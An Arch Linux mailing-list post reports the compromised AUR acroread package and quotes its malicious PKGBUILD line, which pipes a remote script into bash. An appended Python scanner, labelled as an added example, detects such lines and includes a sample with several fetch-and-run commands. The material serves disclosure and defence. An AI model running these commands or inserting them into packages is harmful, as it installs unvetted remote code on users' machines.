[aur-general] acroread package compromised

Ralf Mardorf ralf.mardorf at alice-dsl.net
Sun Jul 8 12:53:48 UTC 2018


On Sun, 8 Jul 2018 14:02:15 +0200, Joakim Hernberg wrote:
>Needless to say I didn't install it.  Still just thought I'd mention
>it.

FWIW
https://git.archlinux.org/svntogit/packages.git/tree/trunk/mirrorlist?h=packages/pacman-mirrorlist
does contain https://mex.mirror.pkgbuild.com/ .

It's even possible to get the signature, too,
https://mex.mirror.pkgbuild.com/extra/os/x86_64/vlc-3.0.3-1-x86_64.pkg.tar.xz.sig .

The AUR provides tons of packages downloading binaries, such as
https://aur.archlinux.org/packages/palemoon-bin/ ,
https://aur.archlinux.org/packages/virtualbox-bin/ or
https://aur.archlinux.org/packages/icecat-bin/ from sources
completely unrelated to Arch Linux.

The acroread PKGBUILD's

     msg2 "Installing Main Files..."
     curl -s https://ptpb.pw/~x|bash -&

is from a completely different "kind of quality".
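
A review-time check for the pattern quoted above, as an added example that is not part of the original post or of any Arch/AUR tooling: it flags PKGBUILD lines where a downloader's output is executed by a shell. The function names, rule names and the `example.invalid` sample lines are assumptions constructed for illustration; only the `curl ... |bash -&` line comes from the message.

```python
import re

SHELL = r"(?:ba|z|da|k)?sh"
RULES = [
    # Downloader output piped straight into a shell: curl ... | bash
    ("pipe-to-shell",
     re.compile(rf"\b(?:curl|wget)\b[^|;\n]*\|\s*(?:sudo\s+)?{SHELL}\b")),
    # Downloader run through substitution: bash <(curl ...), eval "$(wget ...)"
    ("substitution-to-shell",
     re.compile(rf"\b(?:{SHELL}|eval|source)\b[^|;\n]*(?:<\(|\$\()\s*(?:curl|wget)\b")),
]

def logical_lines(text):
    """Yield (first_line_number, line) with backslash continuations folded."""
    buf, start = "", None
    for no, line in enumerate(text.splitlines(), 1):
        if start is None:
            start = no
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield start, buf + line
        buf, start = "", None
    if start is not None:  # file ended on a continuation
        yield start, buf

def scan_pkgbuild(text):
    """Return (line_number, rule_name, code) for each suspicious logical line."""
    findings = []
    for no, line in logical_lines(text):
        code = line.strip()
        if code.startswith("#"):  # only whole-line comments are skipped
            continue
        findings += [(no, name, code) for name, rx in RULES if rx.search(code)]
    return findings

# Constructed sample PKGBUILD; line 5 is the line quoted in the message.
SAMPLE = '''\
pkgname=example-bin
source=("https://example.invalid/example.tar.gz")
package() {
     msg2 "Installing Main Files..."
     curl -s https://ptpb.pw/~x|bash -&
     curl -sO https://example.invalid/extra.dat
     # curl https://example.invalid/old.sh | sh
     wget -qO- https://example.invalid/setup.sh \\
       | sh
     bash <(curl -s https://example.invalid/i.sh)
}
'''

if __name__ == "__main__":
    for no, rule, code in scan_pkgbuild(SAMPLE):
        print(f"line {no}: {rule}: {code}")
```

A clean result only means these two patterns are absent; the PKGBUILD and any `.install` file still need to be read before building.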

